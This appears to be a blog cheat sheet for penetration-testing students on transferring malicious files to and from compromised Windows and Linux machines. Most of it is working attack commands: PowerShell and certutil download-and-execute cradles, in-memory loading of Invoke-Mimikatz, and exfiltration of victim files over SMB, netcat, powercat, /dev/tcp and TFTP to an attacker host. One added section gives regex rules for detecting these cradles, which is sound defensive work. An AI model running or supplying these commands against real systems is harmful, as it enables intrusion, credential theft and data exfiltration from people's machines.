Upping your file transfer game

Transferring files is easy. Transferring files on hardened machines remotely, while trying to stay inconspicuous and undetected is a little harder. This here is to try and help with a few methods to add to your toolbelt.

by Johann Van Niekerk

Introduction

Transferring files sounds like a simple concept, and most people would agree that 'transferring' movies, PDF or DOCX files and similar documents is as easy as opening a shared folder or moving the files onto a disk such as a portable hard drive or a USB stick. That is simple enough, but in the context of Offensive Security the idea is to transfer malicious files to other computers remotely, using methods that are a little closer to manipulating or taking advantage of the underlying programming of an operating system and the software available on it.

This is important because not every computer, user or enterprise is guaranteed to have the same tools available to make file transfers work, for reasons ranging from not having a programming language like Python installed to deliberate security hardening within a business.

It is worth mentioning that these files are also malicious, with the intention of exploitation, and that doesn't make this easy. So I've prepared a bunch of methods that I've used and come across to show you a diverse cheat-sheet for transferring files between various operating systems and software, allowing you to get the tools you need onto the remote system.

Full disclosure: As these topics are regarding Offensive Security tactics, this is being written with the intention of researching and you should not test these tools out without prior experience or understanding of what you are doing and what the tools are doing. Many of these tools are clearly intended for exploitation and should not be kept on your system.

A Braindump of Tools & Methods

Python HTTP Server

The following is a nice and simple method of hosting files on your system and allowing remote access to them. The only requirement is having Python installed, and it is usable across operating systems. A simple example would be that the pentester sets up a server hosting a file called malicious_file.exe; a remote machine can then access and download that file through the browser at http://pentester_ip/, which lists all the items being hosted on the Python server, or download it with various tools, e.g. wget http://pentester_ip/malicious_file.exe.

Setting up Python HTTP Server:

# Setup HTTP Server In Current Directory
python -m SimpleHTTPServer 80
python3 -m http.server 80
    -> '[ pentester ] Setup server in directory to feed file on port 80'

Updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic authentication. This tool is nifty as it allows uploading (or in the event of compromise; exfiltrating 'sensitive') documents from the remote machine and having it saved locally on your own machine.

The tool has the same dependency, in that Python must be installed, but it provides some additional benefits that are certainly welcome. It is definitely a preferred method for downloading and uploading documents or files.

Installation:

# Install
pip3 install updog

Use From Commandline:

# Usage
updog
updog -d /chosen/directory
updog -d /chosen/directory -p chosen_port

Example of what it looks like:

SMB

SMB is a well known protocol, and I am sure a lot of people are familiar with it, but it is also a great way of sharing and transferring files, and of exploitation. The best part about using SMB to share to a Windows host is that you don't need to transfer anything; you can run the pentesting tools directly from your own machine. Part of the Impacket collection of scripts, impacket-smbserver is a great way to set up a quick share folder in the current directory, so that tools can be run from it without any of them being copied onto the target system at all.

Below are a few examples of using SMB for file transfers to a remote Windows machine.

Installation:

sudo apt install impacket-scripts

Navigate to directory to share:

# Setup SMB server in current directory
impacket-smbserver share .

Running tools directly from the share on a Remote Machine:

# Example of Running Tools [ Perspective: Remote Windows Machine]
//10.10.10.10/share/winPEASx64.exe searchall cmd
    -> 'launching "WinPEAS" executable with accompanying switches'
//10.10.10.10/share/lazagne.exe all

Setup to browse shared folder from Remote Machine:

# Attempt to map the SMB share as a drive letter from the remote machine (doesn't always work)
net use Z: \\10.10.10.10\share
    -> 'assign sharefolder to Z: drive'
cd /d Z:
    -> 'navigate to Z drive (cmd needs /d to switch drives; a bare "cd Z:" only records a directory for Z: without changing to it)'

Upload & download files:

# Upload Files To Sharefolder [ Exfiltration ]
# The share name must match the one given to impacket-smbserver (here 'share'); a UNC path carries no port
copy victim_outgoing_file.txt \\10.10.10.10\share\pentester_saved_file.txt

# Download Files From Sharefolder
copy \\10.10.10.10\share\pentester_outgoing_file.txt .\victim_saved_file.txt
copy \\10.10.10.10\share\PowerUp.ps1 .

SCP

SCP, or Secure Copy, is a protocol built on top of SSH that allows files to be uploaded or downloaded remotely. If you understand SSH then you will understand the SCP syntax, and the examples below demonstrate how powerful it is for transferring files.

The obvious benefit is that, being based on SSH, it inherits all the benefits of the SSH protocol, such as the traffic being encrypted, thereby assuring the authenticity and confidentiality of the files in transit.

Upload & download files:

# Download File [ From Victim To Pentester ]
scp -P 2222 student@10.10.10.10:victim_incoming_file.exe ./attacker_saved_file.exe

# Upload File [ From Pentester To Victim ]
scp -P 2222 ./attacker_outgoing_file.exe student@10.10.10.10:/tmp/victim_saved_file.exe

Powershell

The methods below use PowerShell and whichever supported modules happen to be available. Be aware that the idea behind them is to make a quick one-liner; adapt the commands to the situation.

For example, depending on whether you have a PowerShell shell or a CMD shell:

# Methods of accessing TEMP folder
$env:temp
cmd /c $env:temp/shell.exe
powershell.exe -c $env:temp/shell.exe

WebClient Download:

#WebClient - Download & Execute
powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10:1234/PsExec.exe', '$env:temp\psexec.exe')"; powershell.exe -c $env:temp/psexec.exe
    # or cmd /c $env:temp/shell.exe

Wget Download:

# Wget - Download & Execute (in PowerShell 'wget' is an alias of Invoke-WebRequest, so it needs a full URL and -OutFile; a bare -o is ambiguous)
powershell.exe -nop -ep bypass -c "wget 'http://10.10.10.10:1234/shell.exe' -OutFile $env:temp/shell.exe"; powershell.exe -c $env:temp/shell.exe

Bitsadmin Download:

# Bitsadmin - Download & Execute
powershell.exe -nop -ep bypass -c "bitsadmin /transfer wcb /priority foreground http://10.10.10.10:1234/shell.exe $env:temp/shell.exe";  powershell.exe -c $env:temp/shell.exe

Invoke-WebRequest Download:

# Invoke-WebRequest - Download & Execute
powershell.exe -nop -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.10.10:1234/shell.exe' -Outfile '$env:temp/shell.exe'"; cmd.exe /c $env:temp/shell.exe;

IEX - Load Script To Memory:

# IEX - Load ps1 Script directly into memory
powershell.exe -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10:1234/Invoke-Mimikatz.ps1')"

BitsTransfer

A PowerShell module that must be imported before it can be used. BitsTransfer is a little hit & miss: it is present by default on many machines, but it is more often than not disabled intentionally.

BitsTransfer Download:

# BitsTransfer Download & Execute
# Present by default on many machines but not guaranteed
# The module has to be imported inside the same PowerShell process that calls Start-BitsTransfer
powershell.exe -nop -exec bypass -c "Import-Module BitsTransfer; Start-BitsTransfer -Source 'http://10.10.10.10:1234/shell.exe' -Destination './shell.exe'; ./shell.exe"

Apache Server Upload

This requires setting up a few items in order to make use of an Apache server. The setup is done on a Linux host and needs all the dependencies installed to have it up and running.

Setup an Upload.php Page & Code:

# Create & Save 'upload.php' >> /var/www/html
<?php
// Directory the uploaded files are written to (must be writable by www-data)
$uploaddir = '/var/www/uploads/';

// basename() stops a client-supplied name from escaping the uploads directory
$uploadfile = $uploaddir . basename($_FILES['file']['name']);

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

Setup an Uploads directory:

# Make Uploads folder
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Ensure you start the Apache2 service:

service apache2 start

Upload through POST requests

# Upload file from TEMP folder to Kali /var/www/uploads (the script name must match the one saved above)
powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', '$env:temp\shell.exe')"
    # 2nd argument (path) requires FULL path

CMD

When you are dealing with just a plain command prompt, without PowerShell and its powerful features, the following still work.

# Methods of accessing TEMP folder
%tmp%
cmd /c %tmp%/shell.exe
powershell.exe -c %tmp%/shell.exe

# Chain Commands
&&  : Run the next command only if the previous one succeeded
&   : Run the next command after the previous one, regardless of its result
|   : Pipe the output of the previous command into the next one

Certutil - Download:

# Certutil
certutil -urlcache -f http://10.10.10.10:1234/plink32.exe %tmp%/plink32.exe && %tmp%/plink32.exe

Bitsadmin - Download:

#  Bitsadmin
cmd.exe /c "bitsadmin /transfer wcb /priority foreground http://10.10.10.10:1234/shell.exe %tmp%/shell.exe" && %tmp%/shell.exe

Powershell - Download:

# Powershell
powershell.exe -nop -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10:1234/shell.exe', '%tmp%/shell.exe')"; cmd.exe /c %tmp%/shell.exe
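As an added example (not part of the original post), the one-liners in the PowerShell, CMD and SMB sections above are exactly what a detection engineer looks for in process-creation telemetry such as Sysmon Event ID 1 or EDR command-line logs. The Python below classifies command lines against those patterns; the events it runs on are constructed here, not real logs, and the rule names are my own.

```python
import re

# Rules are (name, regex over the full command line); deliberately tolerant of
# case and spacing because the cradles above get typed in many variations.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*https?://", re.I)),
    ("bitsadmin_transfer",
     re.compile(r"bitsadmin(\.exe)?\s.*/transfer\b.*https?://", re.I)),
    ("webclient_downloadfile",
     re.compile(r"Net\.WebClient.*\.DownloadFile\(", re.I)),
    ("downloadstring_iex",
     re.compile(r"\bIEX\b.*DownloadString\(|DownloadString\(.*\|\s*IEX\b", re.I)),
    ("invoke_webrequest_outfile",
     re.compile(r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b).*-OutFile\b", re.I)),
    ("start_bitstransfer",
     re.compile(r"Start-BitsTransfer\b.*-Source\b", re.I)),
    ("unc_path_execution",  # binary launched straight off an SMB share
     re.compile(r"(^|\s)(\\\\|//)\d{1,3}(\.\d{1,3}){3}[\\/]\S+\.(exe|ps1|bat|dll)\b", re.I)),
]
# Not a download on its own, but it accompanies nearly every cradle on this page.
EXEC_POLICY_BYPASS = re.compile(r"-(ep|exec|executionpolicy)\s+bypass\b", re.I)

def classify(cmdline):
    """Return the sorted rule names matched by one process command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if hits and EXEC_POLICY_BYPASS.search(cmdline):
        hits.append("execution_policy_bypass")
    return sorted(hits)

def triage(events):
    """Keep only events that match a rule, grouped per host:
    {host: [(image, [rule, ...]), ...]}."""
    findings = {}
    for ev in events:
        hits = classify(ev["cmdline"])
        if hits:
            findings.setdefault(ev["host"], []).append((ev["image"], hits))
    return findings

# Constructed process-creation events (not real telemetry), shaped like the
# one-liners in the PowerShell, CMD and SMB sections of the post.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": "cmd.exe", "cmdline":
     "certutil -urlcache -f http://10.10.10.10:1234/plink32.exe %tmp%/plink32.exe"},
    {"host": "WS01", "image": "powershell.exe", "cmdline":
     "powershell.exe -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://10.10.10.10:1234/Invoke-Mimikatz.ps1')\""},
    {"host": "WS02", "image": "cmd.exe", "cmdline":
     "//10.10.10.10/share/winPEASx64.exe searchall cmd"},
    {"host": "WS02", "image": "powershell.exe", "cmdline": "powershell.exe -c Get-Process"},
]
```

Calling triage(SAMPLE_EVENTS) returns the two WS01 cradles and the WS02 share-launched binary, and drops the harmless Get-Process line; the same regexes translate directly into a SIEM or Sysmon rule.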

Netcat

Because netcat simply streams raw bytes over the connection, be extra cautious when transferring binary files, as a binary can end up corrupted when it is written out on the receiving end; compare a checksum of the file on both sides before running it.

Download & Upload:

# Setup Listener, wait for file [ Receiving end ]
nc -lvnp 4444 > incoming_file.sh

# Send File to Listener [ Sending end; port must match the listener ]
nc -nv 10.10.10.10 4444 < sending_file.sh

# Setup Listener, Send File to whoever connects [ Sending end ]
nc -lvnp 4444 < sending_file.sh

# Connect to Retrieve File [ Receiving end ]
nc -nv 10.10.10.10 4444 > incoming_file.sh

Powercat.ps1

Dubbed the Netcat for PowerShell, it accomplishes the same as Netcat does, but from PowerShell and with its own syntax compared to netcat. The tool is useful if it is available, or if you prefer the netcat method for exfiltration of data. Additionally, as this is a PowerShell script, it can be loaded in memory without worrying about anything being written to disk.

Download & Upload:

# Setup listener to receive file [ Pentester ]
nc -lvnp 4444 > incoming_file.sh

# Send file to Listener [ Victim; -i reads the input file ]
powercat -c 10.10.10.10 -p 4444 -i /path/to/victim_outgoing_file.sh

# Setup listener to send file [ Pentester ]
nc -lvnp 4444 < attacker_outgoing_file.sh

# Connect and retrieve file [ Victim; -of writes what is received to a file ]
powercat -c 10.10.10.10 -p 4444 -of /path/to/victim_saved_file.sh

One liner to Exfiltrate Data:

powershell.exe -nop -ep bypass -c "iex (New-Object System.Net.WebClient).DownloadString('http://172.16.40.5:1234/powercat.ps1'); powercat -c 172.16.40.5 -p 4444 -i 'C:\Path\To\Outgoing\File.txt' -v"

Socat

Socat has a reputation of being an advanced version of netcat. Among its various features that include port forwarding, reverse shells & pivoting; it is also a great multi-relaying tool for transferring data. It does require that the binary (whether linux or windows executable) is on both endpoints in order to create the connection. Netcat can also connect to a Socat endpoint although the features may be limited.

Download & Upload:

# Syntax below is interchangeable
# Setup Listener to Receive File
socat -u tcp-listen:4444,reuseaddr open:shell.exe,create

# Send File to Listener
socat -u file:shell.exe tcp-connect:10.10.10.10:4444

# Setup Listener to Send File
socat TCP4-LISTEN:4444,fork file:./shell.exe

# Connect and Retrieve file
socat TCP4:10.10.10.10:4444 file:shell.exe,create

WGET

Wget is a nice and simple utility to download files from the web over the HTTP, HTTPS and FTP protocols. It ships by default with most Linux distributions, and on Windows 'wget' also exists in PowerShell, though there it is only an alias for Invoke-WebRequest and takes that cmdlet's options.

Download:

# Download File
wget 10.10.10.10:1234/program.sh -O /dev/shm/Save_program_here.sh

Curl

Curl is a tool for transferring data to and from a server. It is powerful and offers a busload of useful tricks while interacting with numerous different protocols. The following is a snippet of just being able to upload & download files.

Download & Upload:

# Download File
curl 10.10.10.10:1234/program.sh -o /dev/shm/program.sh

# Upload Through POST Request
curl -X POST "https://MyUsername:MySecretPassword@api.bitbucket.org/2.0/repositories/dummyTeam/myproject/downloads" --form files=@"/home/dev/release/myproject-current.zip"

/dev/tcp

This uses Bash's redirection features to write to and read from a TCP socket. The technique is specific to Linux victims and uses /dev/tcp to redirect data to, and communicate with, an external machine. With the scope limited to transferring files, the following is a brief overview of how to use it.

Transfer File From Victim:

# Setup Kali Listener, Waiting for file
nc -lvnp 80 > attacker_incoming_file.sh 

# Connect to listener and send file
cat /path/victim_sending_file.sh > /dev/tcp/10.10.10.10/80
bash -c 'cat /path/victim_sending_file.sh > /dev/tcp/10.10.10.10/80' 

Transfer File To Victim:

# Setup Kali Listener, feeding file
nc -w5 -lvnp 80 < attacker_sending_file.txt

# Connect to listener and get file
exec 6< /dev/tcp/10.10.10.10/80
cat <&6 > victim_incoming_file.txt

# Alternative, get file (same listener on port 80 as above)
bash -c 'cat < /dev/tcp/10.10.10.10/80 > victim_receiving_file.sh'

Transfer File To Attacker HTTP Service:

# Upload from Victim over HTTP  [ require HTTP service running on the attacker machine ]
bash -c 'echo -e "POST / HTTP/0.9 $(<flag2hex.bat)" > /dev/tcp/10.10.10.10/4444'

FTP Download

Basic FTP file transfer, here using pure-ftpd. It requires some setup in order to get an FTP server running that can be used to upload and download files.

# Setup FTP on Attacker Machine
sudo apt update && sudo apt install pure-ftpd

# Script to setup FTP
#!/bin/bash
# Setup with USER atk & PASS atk (pure-pw useradd prompts for the password)
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /bin/zsh ftpuser
sudo pure-pw useradd atk -u ftpuser -d /ftphome
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd

# Move Share files into /ftphome
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/

# [Windows Victim] Create textfile.txt locally, sending commands through a non-interactive REMOTE shell:
# (keep a space before the '>' on the first line, otherwise cmd reads '21>' as a handle redirection and drops the '1')
echo open 192.168.119.249 21 > textfile.txt
echo USER atk >> textfile.txt
echo atk >> textfile.txt
echo bin >> textfile.txt
echo GET nc.exe >> textfile.txt
echo bye >> textfile.txt

# Issue Command to transfer file locally
ftp -v -n -s:textfile.txt

VBScript Download

This uses a VBScript, run with cscript, to download a file. It requires setting up a pseudo-wget utility script that performs the download.

# VBScript HTTP downloader script

# [Windows Victim] Create wget.vbs Script locally sending commands through non-interactive REMOTE shell:
# This Script will be a pseudo wget Utility
# You Can copy/paste the entire lot into your remote shell
echo "strUrl = WScript.Arguments.Item(0)" > wget.vbs
echo "StrFile = WScript.Arguments.Item(1)" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" >> wget.vbs
echo "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" >> wget.vbs
echo "Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts" >> wget.vbs
echo " Err.Clear" >> wget.vbs
echo " Set http = Nothing" >> wget.vbs
echo ' Set http = CreateObject("WinHttp.WinHttpRequest.5.1")' >> wget.vbs
echo ' If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")' >> wget.vbs
echo ' If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")' >> wget.vbs
echo ' If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")' >> wget.vbs
echo ' http.Open "GET", strURL, False' >> wget.vbs
echo " http.Send" >> wget.vbs
echo " varByteArray = http.ResponseBody" >> wget.vbs
echo " Set http = Nothing" >> wget.vbs
echo ' Set fs = CreateObject("Scripting.FileSystemObject")' >> wget.vbs
echo ' Set ts = fs.CreateTextFile(StrFile, True)' >> wget.vbs
echo ' strData = ""' >> wget.vbs
echo ' strBuffer = ""' >> wget.vbs
echo " For lngCounter = 0 to UBound(varByteArray)" >> wget.vbs
echo " ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))" >> wget.vbs
echo " Next" >> wget.vbs
echo " ts.Close" >> wget.vbs

# Powershell - Executing the VBScript HTTP downloader script with cscript:
cscript wget.vbs http://192.168.119.249:1234/shell.exe shell.exe

TFTP Upload

Use TFTP to exfiltrate files to your local machine.

# Setup TFTP on Kali Port 69
sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp

# Start Service
sudo atftpd --daemon --port 69 /tftp

# [Windows Victim] Run tftp client on Windows system and upload to /tftp folder
tftp -i 192.168.119.249 put ./shell.exe

Final Word

While this was a braindump of various methods, there are many more out there that you may prefer. This was similarly intended for other students who are at a level of understanding what the tools do and how to set up, install or navigate the instructions to make them work.

Hopefully you found a couple of tips that you can add to your own collection of notes!